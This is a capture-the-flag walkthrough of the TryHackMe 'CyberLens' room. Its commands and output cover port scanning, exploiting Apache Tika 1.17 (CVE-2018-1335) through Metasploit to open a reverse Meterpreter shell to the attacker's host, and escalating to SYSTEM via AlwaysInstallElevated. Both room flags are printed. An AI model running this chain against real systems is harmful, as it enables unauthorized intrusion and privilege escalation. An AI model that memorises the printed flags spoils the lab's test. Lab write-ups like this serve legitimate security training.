Overview
This is a walkthrough of the TryHackMe room "CyberLens".
Task 1
Q1. What is the user flag?
Hint. Sometimes exploits take a few tries before they are successful ;)
Start with a full port scan of the target.
$ nmap -Pn -sC -sV -A -T4 -p- 10.10.200.202 -oN nmap_result
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-07-20T21:59:23+00:00
|_ssl-date: 2024-07-20T21:59:32+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-07-19T21:37:13
|_Not valid after:  2025-01-18T21:37:13
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  tcpwrapped
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
| http-methods:
|_  Potentially risky methods: PUT
|_http-title: Welcome to the Apache Tika 1.17 Server
|_http-cors: HEAD GET
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-07-20T21:59:27
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: mean: 3s, deviation: 0s, median: 2s
The scan tells us which ports are open. Port 80 serves the company website, so we browse to it first (the hostname cyberlens.thm used below has to be mapped to the target IP in /etc/hosts).
Next, a directory scan of the site:
$ dirsearch -u http://cyberlens.thm/
[06:59:21] 301 - 232B - /js -> http://cyberlens.thm/js/
[06:59:40] 200 - 6KB - /about.html
[07:00:09] 403 - 199B - /cgi-bin/
[07:00:14] 200 - 5KB - /contact.html
[07:00:16] 301 - 233B - /css -> http://cyberlens.thm/css/
[07:00:30] 301 - 236B - /images -> http://cyberlens.thm/images/
[07:00:30] 200 - 2KB - /images/
[07:00:34] 200 - 384B - /js/
The Nmap scan also shows Apache Tika 1.17 (tika-server behind Jetty) on port 61777, and the http-methods script flags PUT as an allowed method. Searching for vulnerabilities in this version turns up CVE-2018-1335: from Tika 1.7 through 1.17, tika-server trusted client-supplied X-Tika-OCR* configuration headers that control the path of the external OCR program it runs on uploaded content, so a crafted PUT request can get an arbitrary command executed on the server. Version 1.18 fixed the header handling.
Metasploit has a working exploit module for this CVE, so we use it.
Select the module.
msf6 > search tika 1.17

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/windows/http/apache_tika_jp2_jscript  2018-04-25       excellent  Yes    Apache Tika Header Command Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/apache_tika_jp2_jscript

msf6 > use 0
Set the required options: the Tika host and port as RHOSTS/RPORT and the attacker's VPN address as LHOST.
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set rhosts cyberlens.thm
rhosts => cyberlens.thm
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set rport 61777
rport => 61777
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set lhost 10.6.55.144
lhost => 10.6.55.144
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set srvport 8081
srvport => 8081
Running the exploit gives a Meterpreter shell as the CyberLens account. The module's AutoCheck confirms the target is vulnerable first, then the command stager delivers the payload in a series of PUT requests to /meta. As the hint says, this can take a few tries; if no session comes back, run exploit again.
msf6 exploit(windows/http/apache_tika_jp2_jscript) > exploit
[*] Started reverse TCP handler on 10.6.55.144:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress - 8.10% done (7999/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress - 16.19% done (15998/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress - 24.29% done (23997/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress - 32.39% done (31996/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress - 40.48% done (39995/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress - 48.58% done (47994/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress - 56.67% done (55993/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress - 64.77% done (63992/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress - 72.87% done (71991/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress - 80.96% done (79990/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress - 89.06% done (87989/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress - 97.16% done (95988/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Sending stage (176198 bytes) to 10.10.179.81
[*] Meterpreter session 1 opened (10.6.55.144:4444 -> 10.10.179.81:49866) at 2025-01-23 07:05:54 -0500
meterpreter > getuid
Server username: CYBERLENS\CyberLens
Switch to a command prompt.
meterpreter > shell
Process 2844 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
cyberlens\cyberlens
The user flag is in C:\Users\CyberLens\Desktop\user.txt.
C:\Users\CyberLens\Desktop>more user.txt
more user.txt
THM{T1k4-CV3-f0r-7h3-w1n}
A. THM{T1k4-CV3-f0r-7h3-w1n}
Q2. What is the admin flag?
Hint. RDP will make your life easier. If Remmina is not working, try this: rdesktop -u [user] -p [password] -N cyberlens.thm:3389
Background the session and select post/multi/recon/local_exploit_suggester.
msf6 exploit(windows/http/apache_tika_jp2_jscript) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester  .                normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(windows/http/apache_tika_jp2_jscript) > use 0
Point the module at the session and run it. exploit/windows/local/always_install_elevated comes back as "The target is vulnerable": the AlwaysInstallElevated policy is enabled, so Windows Installer will run any MSI package with SYSTEM privileges regardless of which user installs it. The other hits are only "appears to be vulnerable", so we take the confirmed one.
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.179.81 - Collecting local exploits for x86/windows...
[*] 10.10.179.81 - 196 exploit checks are being tried...
[+] 10.10.179.81 - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] 10.10.179.81 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.179.81 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.179.81 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.179.81 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 41 / 41
[*] 10.10.179.81 - Valid modules for session 1:
============================

 #  Name                                           Potentially Vulnerable?  Check Result
 -  ----                                           -----------------------  ------------
 1  exploit/windows/local/always_install_elevated  Yes                      The target is vulnerable.
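The suggester's verdict rests on a single policy: Windows Installer elevates an MSI to SYSTEM only when AlwaysInstallElevated is 1 under both HKLM and HKCU, and one hive alone does nothing. A quick manual confirmation from the shell obtained above is to query both keys with reg.exe. The script below is an added example for this walkthrough (not from the room, Metasploit or Microsoft) that parses the output of those two reg query commands and reports whether the condition is fully met; the reg query outputs embedded in it are constructed samples in the format reg.exe prints, not captures from the box.

```python
r"""Added example (not from the original walkthrough): decide whether the
AlwaysInstallElevated policy is exploitable from the output of these two
commands, run on the target:

    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Windows Installer only runs an MSI as SYSTEM when BOTH values are 1.
"""
import re
import sys

# Matches the value line reg.exe prints, e.g.
#     AlwaysInstallElevated    REG_DWORD    0x1
VALUE_RE = re.compile(
    r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$",
    re.MULTILINE,
)


def parse_reg_query(output: str):
    """Return the DWORD as an int, or None when the key or value is
    missing (reg.exe then prints an ERROR: line instead of a value)."""
    m = VALUE_RE.search(output)
    return int(m.group(1), 16) if m else None


def always_install_elevated(hklm_output: str, hkcu_output: str) -> dict:
    """Combine both hives. A missing value counts as not set, and a value
    of 1 in only one hive is not enough to elevate."""
    hklm = parse_reg_query(hklm_output)
    hkcu = parse_reg_query(hkcu_output)
    return {"hklm": hklm, "hkcu": hkcu, "exploitable": hklm == 1 and hkcu == 1}


# Constructed sample outputs in reg.exe's format (not captured from CyberLens).
SAMPLE_HKLM_SET = (
    "\r\n"
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n"
)
SAMPLE_HKCU_SET = (
    "\r\n"
    "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n"
)
SAMPLE_HKCU_ZERO = SAMPLE_HKCU_SET.replace("0x1", "0x0")
SAMPLE_MISSING = (
    "\r\n"
    "ERROR: The system was unable to find the specified registry key or value.\r\n"
)


if __name__ == "__main__":
    # Usage: python3 aie_check.py hklm.txt hkcu.txt   (saved reg query output)
    # With no arguments the constructed samples are evaluated instead.
    if len(sys.argv) == 3:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as f:
            hklm_text = f.read()
        with open(sys.argv[2], encoding="utf-8", errors="replace") as f:
            hkcu_text = f.read()
    else:
        hklm_text, hkcu_text = SAMPLE_HKLM_SET, SAMPLE_HKCU_SET
    print(always_install_elevated(hklm_text, hkcu_text))
```

This is the same condition the Metasploit module's check method tests. The fix on the defensive side is to set "Always install with elevated privileges" to Disabled under both Computer Configuration and User Configuration (Administrative Templates > Windows Components > Windows Installer), which writes 0 to both values.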
Select the module and set its options.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/always_install_elevated
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > set session 1
session => 1
msf6 exploit(windows/local/always_install_elevated) > set lhost 10.6.55.144
lhost => 10.6.55.144
msf6 exploit(windows/local/always_install_elevated) > set lport 1234
lport => 1234
Running it uploads a generated MSI to the user's Temp directory, has Windows Installer execute it, deletes the file, and opens a second session running as NT AUTHORITY\SYSTEM.
msf6 exploit(windows/local/always_install_elevated) > run
[*] Started reverse TCP handler on 10.6.55.144:1234
[*] Uploading the MSI to C:\Users\CYBERL~1\AppData\Local\Temp\1\eXJQvAHed.msi ...
[*] Executing MSI...
[*] Sending stage (176198 bytes) to 10.10.179.81
[+] Deleted C:\Users\CYBERL~1\AppData\Local\Temp\1\eXJQvAHed.msi
[*] Meterpreter session 2 opened (10.6.55.144:1234 -> 10.10.179.81:49871) at 2025-01-23 07:18:21 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
The admin flag is in C:\Users\Administrator\Desktop\admin.txt.
C:\Users\Administrator\Desktop>more admin.txt
more admin.txt
THM{3lev@t3D-4-pr1v35c!}
A. THM{3lev@t3D-4-pr1v35c!}